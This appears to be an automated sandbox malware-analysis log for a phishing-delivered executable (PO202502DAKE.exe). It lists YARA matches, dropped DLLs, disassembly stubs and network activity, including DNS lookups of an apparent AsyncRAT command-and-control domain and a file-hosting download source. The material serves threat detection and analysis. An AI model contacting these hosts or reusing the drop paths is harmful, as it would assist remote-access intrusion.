Source: Yara match | File source: Process Memory Space: PO202502DAKE.exe PID: 8408, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: aspnet_wp.exe PID: 8476, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: PO202502DAKE.exe PID: 8572, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: aspnet_wp.exe PID: 8636, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED

                          Phishing

Source: Screenshot id: 2 | Joe Sandbox AI: Page contains button: 'View Document' Source: 'Screenshot id: 2'
Source: Screenshot id: 2 | Joe Sandbox AI: Screenshot id: 2 contains prominent button: 'view document'
Source: Screenshot id: 5 | Joe Sandbox AI: Page contains button: 'View Document' Source: 'Screenshot id: 5'
Source: Screenshot id: 5 | Joe Sandbox AI: Screenshot id: 5 contains prominent button: 'view document'
Source: Screenshot id: 3 | Joe Sandbox AI: Page contains button: 'View Document' Source: 'Screenshot id: 3'
Source: Screenshot id: 3 | Joe Sandbox AI: Screenshot id: 3 contains prominent button: 'view document'
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 149.137.128.16:443 -> 192.168.2.4:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe | Code function: 12_2_00007FFC9CEF7210 SetLastError,FindFirstFileExW,GetLastError, | 12_2_00007FFC9CEF7210
Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe | Code function: 28_2_00007FFC9CE47210 SetLastError,FindFirstFileExW,GetLastError, | 28_2_00007FFC9CE47210

                          Software Vulnerabilities

                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process created: C:\Program Files\7-Zip\7z.exe
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then mov eax, dword ptr [rsi] 12_2_00007FF6220A7A50
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then mov eax, dword ptr [rcx] 12_2_00007FF6220A55C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FF6220A21F3
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then test rdx, rdx 12_2_00007FFC9CC9DD60
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CD11D30
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rdi 12_2_00007FFC9CD0FF20
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push r14 12_2_00007FFC9CD0FF20
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 38h 12_2_00007FFC9CC7DEE0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 12_2_00007FFC9CC83FA0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rsi 12_2_00007FFC9CCED9D0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CC699C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CCC7980
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 12_2_00007FFC9CC7DB40
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 12_2_00007FFC9CC7DBB0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then xor eax, eax 12_2_00007FFC9CC71650
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 38h 12_2_00007FFC9CCDD640
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push r15 12_2_00007FFC9CC8CCA0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then cmp byte ptr [rcx+1Dh], 00000000h 12_2_00007FFC9CCFCDE0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then mov rcx, qword ptr [rcx+08h] 12_2_00007FFC9CC70F10
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then test rdx, rdx 12_2_00007FFC9CC9F040
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CC75030
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbp 12_2_00007FFC9CD0C9E0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CC84630
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CC84630
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rsi 12_2_00007FFC9CC845A0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 12_2_00007FFC9CC846F0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CD10160
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push r15 12_2_00007FFC9CC98170
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push r15 12_2_00007FFC9CC8E120
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push r15 12_2_00007FFC9CCEE240
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rdi 12_2_00007FFC9CC76260
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CCFE1C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push r15 12_2_00007FFC9CC9819C
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CC84340
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CC84340
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CC84340
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then mov rcx, qword ptr [rcx+08h] 12_2_00007FFC9CEAADD0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CEFBE40
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push r15 12_2_00007FFC9CEC9DB0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rdi 12_2_00007FFC9CF4E020
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push r14 12_2_00007FFC9CF4E020
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 12_2_00007FFC9CEB5ED0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then test rdx, rdx 12_2_00007FFC9CED59C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 38h 12_2_00007FFC9CF11C00
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then cmp edx, 02h 12_2_00007FFC9CF2BB00
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 12_2_00007FFC9CEDBBB0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CEA7650
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rsi 12_2_00007FFC9CECF280
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rsi 12_2_00007FFC9CEF3420
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push r15 12_2_00007FFC9CEC7400
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rsi 12_2_00007FFC9CEF33D0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rsi 12_2_00007FFC9CEBCD40
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 12_2_00007FFC9CEBCCF0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then test r8d, r8d 12_2_00007FFC9CF3AF80
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbp 12_2_00007FFC9CED0E99
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CEBC980
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CEBC980
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CEBC980
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CEDAB30
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CEAEB10
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CEBCC30
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CEBCC30
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbp 12_2_00007FFC9CE92C25
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 12_2_00007FFC9CEBCBE0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 12_2_00007FFC9CEDC5D0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CEF61C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 12_2_00007FFC9CEF61C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then test rdx, rdx 12_2_00007FFC9CED46E0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 12_2_00007FFC9CEBC690
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then mov rax, qword ptr [rcx+08h] 12_2_00007FFC9CEFE230
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbp 12_2_00007FFC9CF4A0E0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 12_2_00007FFC9CEB61E0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rbx 12_2_00007FFC9CEF61C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 12_2_00007FFC9CEF61C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exe; Code function: 4x nop then push rdi 12_2_00007FFC9CEB0190
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then mov eax, dword ptr [rsi] 28_2_00007FF6E44A7A50
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then mov eax, dword ptr [rcx] 28_2_00007FF6E44A55C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FF6E44A21F3
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then test rdx, rdx 28_2_00007FFC9CBEDD60
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CC61D30
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rdi 28_2_00007FFC9CC5FF20
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push r14 28_2_00007FFC9CC5FF20
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 38h 28_2_00007FFC9CBCDEE0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 28_2_00007FFC9CBD3FA0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rsi 28_2_00007FFC9CC3D9D0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CBB99C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CC17980
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 28_2_00007FFC9CBCDB40
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 28_2_00007FFC9CBCDBB0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 38h 28_2_00007FFC9CC2D640
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then xor eax, eax 28_2_00007FFC9CBC167D
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rdi 28_2_00007FFC9CBED780
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push r15 28_2_00007FFC9CBDCCA0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then cmp byte ptr [rcx+1Dh], 00000000h 28_2_00007FFC9CC4CDE0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then mov rcx, qword ptr [rcx+08h] 28_2_00007FFC9CBC0F10
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then test rdx, rdx 28_2_00007FFC9CBEF040
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CBC5030
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbp 28_2_00007FFC9CC5C9E0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CBD4630
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CBD4630
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rsi 28_2_00007FFC9CBD45A0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 28_2_00007FFC9CBD46F0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CC60160
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push r15 28_2_00007FFC9CBE8170
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push r15 28_2_00007FFC9CBDE120
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push r15 28_2_00007FFC9CC3E240
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rdi 28_2_00007FFC9CBC6260
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CC4E1C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push r15 28_2_00007FFC9CBE819C
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CBD4340
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CBD4340
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CBD4340
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then mov rcx, qword ptr [rcx+08h] 28_2_00007FFC9CDFADD0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CE4BE40
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push r15 28_2_00007FFC9CE19DB0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 28_2_00007FFC9CE05ED0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rdi 28_2_00007FFC9CE9E020
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push r14 28_2_00007FFC9CE9E020
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then test rdx, rdx 28_2_00007FFC9CE259C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then cmp edx, 02h 28_2_00007FFC9CE7BB00
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 38h 28_2_00007FFC9CE61C00
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 28_2_00007FFC9CE2BBB0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CDF7650
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rsi 28_2_00007FFC9CE1F280
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rsi 28_2_00007FFC9CE43420
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push r15 28_2_00007FFC9CE17400
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rsi 28_2_00007FFC9CE433D0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rsi 28_2_00007FFC9CE0CD40
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 28_2_00007FFC9CE0CCF0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbp 28_2_00007FFC9CE20E99
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then test r8d, r8d 28_2_00007FFC9CE8AF80
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CE0C980
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CE0C980
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CE0C980
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CE2AB30
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CDFEB10
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbp 28_2_00007FFC9CDE2C25
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CE0CC30
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CE0CC30
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 28_2_00007FFC9CE0CBE0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 28_2_00007FFC9CE2C5D0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CE461C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 28_2_00007FFC9CE461C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then test rdx, rdx 28_2_00007FFC9CE246E0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 28_2_00007FFC9CE0C690
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbp 28_2_00007FFC9CE9A0E0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then mov rax, qword ptr [rcx+08h] 28_2_00007FFC9CE4E230
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 28_2_00007FFC9CE061E0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 28_2_00007FFC9CE461C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then sub rsp, 28h 28_2_00007FFC9CE461C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rdi 28_2_00007FFC9CE00190
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then mov eax, dword ptr [rsi] 33_2_00007FF6E44A7A50
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then mov eax, dword ptr [rcx] 33_2_00007FF6E44A55C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exe; Code function: 4x nop then push rbx 33_2_00007FF6E44A21F3
                          Source: global traffic; DNS query: name: f004.backblazeb2.com
                          Source: global traffic; DNS query: name: myasyncrat.ddns.net (2 queries)
                          Source: global traffic; DNS query: name: otelrules.svc.static.microsoft
                          Source: global traffic; DNS query: name: myasyncrat.ddns.net (8 further queries)
                          Source: global traffic; TCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global traffic; TCP traffic: 192.168.2.4:49737 -> 13.107.246.60:443
                          Source: global traffic; TCP traffic: 192.168.2.4:49738 -> 13.107.246.60:443
                          Source: global traffic; TCP traffic: 192.168.2.4:49739 -> 13.107.246.60:443
                          Source: global traffic; TCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443 (92 further identical entries)
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
